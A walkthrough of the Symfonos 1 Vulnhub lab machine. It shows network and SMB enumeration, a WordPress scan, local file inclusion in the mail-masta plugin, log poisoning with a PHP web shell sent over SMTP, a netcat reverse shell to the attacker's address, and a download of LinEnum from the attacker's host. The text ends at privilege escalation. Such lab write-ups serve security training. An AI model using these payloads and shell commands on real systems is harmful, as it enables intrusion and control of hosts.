Symfonos 1

Symfonos 1 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/sym1 192.168.1.112

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 06:26 EDT
Nmap scan report for 192.168.1.112
Host is up (0.00017s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:04:0F:D1 (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2020-05-15T05:27:13-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T10:27:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds

When I put the IP to the browser and it shows this

Nothing interesting with dirb either, let's use enum4linux to see what can we find

enum4linux

enum4linux -a 192.168.1.112

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 06:47:58 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.112
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.112    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.1.112    |
 ============================================= 
Looking up status of 192.168.1.112
        SYMFONOS        <00> -         B <ACTIVE>  Workstation Service
        SYMFONOS        <03> -         B <ACTIVE>  Messenger Service
        SYMFONOS        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.1.112    |
 ====================================== 
[+] Server 192.168.1.112 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.112    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.1.112    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.112 from smbclient: 
[+] Got OS info for 192.168.1.112 from srvinfo:
        SYMFONOS       Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 192.168.1.112    |
 ============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: helios   Name:   Desc: 

user:[helios] rid:[0x3e8]

 ========================================== 
|    Share Enumeration on 192.168.1.112    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS

[+] Attempting to map shares on 192.168.1.112
//192.168.1.112/print$  Mapping: DENIED, Listing: N/A
//192.168.1.112/helios  Mapping: DENIED, Listing: N/A
//192.168.1.112/anonymous       Mapping: OK, Listing: OK
//192.168.1.112/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.1.112    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 192.168.1.112 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 192.168.1.112    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.1.112 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3173842667-3005291855-38846888
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-3173842667-3005291855-38846888 and logon username '', password ''
S-1-5-21-3173842667-3005291855-38846888-500 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-501 SYMFONOS\nobody (Local User)
S-1-5-21-3173842667-3005291855-38846888-502 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-503 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-504 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-505 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-506 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-507 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-508 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-509 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-510 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-511 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-512 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-513 SYMFONOS\None (Domain Group)
S-1-5-21-3173842667-3005291855-38846888-514 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-515 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-516 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-517 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-518 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-519 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-520 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-521 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-522 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-523 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-524 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-525 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-526 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-527 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-528 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-529 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-530 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-531 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-532 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-533 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-534 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-535 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-536 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-537 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-538 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-539 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-540 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-541 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-542 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-543 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-544 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-545 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-546 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-547 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-548 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-549 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-550 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\helios (Local User)
S-1-5-21-3173842667-3005291855-38846888-1001 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1002 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1003 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1004 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1005 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1006 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1007 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1008 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1009 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1010 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1011 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1012 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1013 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1014 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1015 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1016 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1017 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1018 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1019 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1020 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1021 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1022 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1023 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1024 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1025 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1026 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1027 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1028 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1029 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1030 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1031 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1032 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1033 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1034 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1035 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1036 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1037 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1038 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1039 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1040 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1041 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1042 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1043 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1044 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1045 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1046 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1047 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1048 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1049 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\helios (Local User)

 ============================================== 
|    Getting printer info for 192.168.1.112    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 15 06:48:15 2020

As we can see here, we have 2 share folders named helios and anonymous that we can check them out

smbclient

We can type

smbclient //192.168.1.112/anonymoys, then with no password, we can login.

Then, type ls to show anything inside that server.

Then we can type get attention.txt to download the file.

Then, we can cat the file, to show the text inside

This might be the password for the helios sharefolder

So then in the terminal, type

smbclient //192.168.1.112/helios -U helios then password is qwerty

List the files again using ls and we got 2 text files, research.txt and todo.txt

Open those 2 text files and we got this

we can see that there is a /h3l105 at the end of the todo.txt then we can put it inside the web browser just now.

We can see the site is not load up properly, immediately I know that we need to add the IP to the /etc/hosts

Reload the webpage

We can see that this is powered by WordPress, so we use wpscan to enumerate the WordPress website to find whether it has any vulnerabilities.

wpscan

we type this inside the terminal

wpscan --url http://symfonos.local/h3l105 --enumerate p 

It is recommend to use symfonos.local that we created at /etc/hosts because we might miss anything important while scanning using wpscan

p stands for popular plugins

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://symfonos.local/h3l105/ [192.168.1.112]
[+] Started: Fri May 15 07:17:13 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://symfonos.local/h3l105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://symfonos.local/h3l105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://symfonos.local/h3l105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://symfonos.local/h3l105/index.php/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://symfonos.local/h3l105/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri May 15 07:17:16 2020
[+] Requests Done: 33
[+] Cached Requests: 5
[+] Data Sent: 8.48 KB
[+] Data Received: 484.737 KB
[+] Memory used: 177.504 MB
[+] Elapsed time: 00:00:03

Exploit

After Googling for awhile, I found out that mail-masta is actually vulnerable to Remote Code Execution (RCE), we can find it at exploit-db.

Replace the URL with the query provided the we will get this

From here, we can know that there is a user is called helios

I know from here that postfix store their mail at /var/mail/username

curl

curl -s http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

From root@symfonos.localdomain  Fri Jun 28 21:08:55 2019
Return-Path: <root@symfonos.localdomain>
X-Original-To: root
Delivered-To: root@symfonos.localdomain
Received: by symfonos.localdomain (Postfix, from userid 0)
        id 3DABA40B64; Fri, 28 Jun 2019 21:08:54 -0500 (CDT)
From: root@symfonos.localdomain (Cron Daemon)
To: root@symfonos.localdomain
Subject: Cron <root@symfonos> dhclient -nw
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <20190629020855.3DABA40B64@symfonos.localdomain>
Date: Fri, 28 Jun 2019 21:08:54 -0500 (CDT)

/bin/sh: 1: dhclient: not found

From MAILER-DAEMON  Fri May 15 03:59:12 2020
Return-Path: <>
X-Original-To: helios@symfonos.localdomain
Delivered-To: helios@symfonos.localdomain
Received: by symfonos.localdomain (Postfix)
        id A851B40B7A; Fri, 15 May 2020 03:59:12 -0500 (CDT)
Date: Fri, 15 May 2020 03:59:12 -0500 (CDT)
From: MAILER-DAEMON@symfonos.localdomain (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: helios@symfonos.localdomain
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
        boundary="2EE7C40AB0.1589533152/symfonos.localdomain"
Content-Transfer-Encoding: 8bit
Message-Id: <20200515085912.A851B40B7A@symfonos.localdomain>

This is a MIME-encapsulated message.

--2EE7C40AB0.1589533152/symfonos.localdomain
Content-Description: Notification
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit

This is the mail system at host symfonos.localdomain.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

                   The mail system

<helios@blah.com>: Host or domain name not found. Name service error for
    name=blah.com type=MX: Host not found, try again

--2EE7C40AB0.1589533152/symfonos.localdomain
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; symfonos.localdomain
X-Postfix-Queue-ID: 2EE7C40AB0
X-Postfix-Sender: rfc822; helios@symfonos.localdomain
Arrival-Date: Fri, 28 Jun 2019 19:46:02 -0500 (CDT)

Final-Recipient: rfc822; helios@blah.com
Original-Recipient: rfc822;helios@blah.com
Action: failed
Status: 4.4.3
Diagnostic-Code: X-Postfix; Host or domain name not found. Name service error
    for name=blah.com type=MX: Host not found, try again

--2EE7C40AB0.1589533152/symfonos.localdomain
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Return-Path: <helios@symfonos.localdomain>
Received: by symfonos.localdomain (Postfix, from userid 1000)
        id 2EE7C40AB0; Fri, 28 Jun 2019 19:46:02 -0500 (CDT)
To: helios@blah.com
Subject: New WordPress Site
X-PHP-Originating-Script: 1000:class-phpmailer.php
Date: Sat, 29 Jun 2019 00:46:02 +0000
From: WordPress <wordpress@192.168.201.134>
Message-ID: <65c8fc37d21cc0046899dadd559f3bd1@192.168.201.134>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

http://192.168.201.134/h3l105

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during installation.
Log in here: http://192.168.201.134/h3l105/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/

Log Poisoning via Mail

We can actually send a php code to the victim to get a shell

telnet

By using telnet, we can type

telnet 192.168.1.112 25

Then we can type

MAIL FROM:<choo>

RCPT TO:helios

data

<?php system($_GET['cmd']); ?>

.

After that go back to the browser and replace /var/mail/helios&cmd=id after the pl=

We can see it successfully get a shell!

Reverse Shell

type nc -nlvp 4444 at our machine and then nc -e /bin/bash 192.168.43.182 4444 at the URL

Got a connection !

Then we need to type

python -c 'import pty; pty.spawn("/bin/bash")' to get a proper shell.

Privilege Escalation

LinEnum

You can download the script at here

Then we can fire up our python to create a server by typing

python -m SimpleHTTPServer

Then at the victim's machine, we can type wget 192.168.43.182:8000/LinEnum.sh

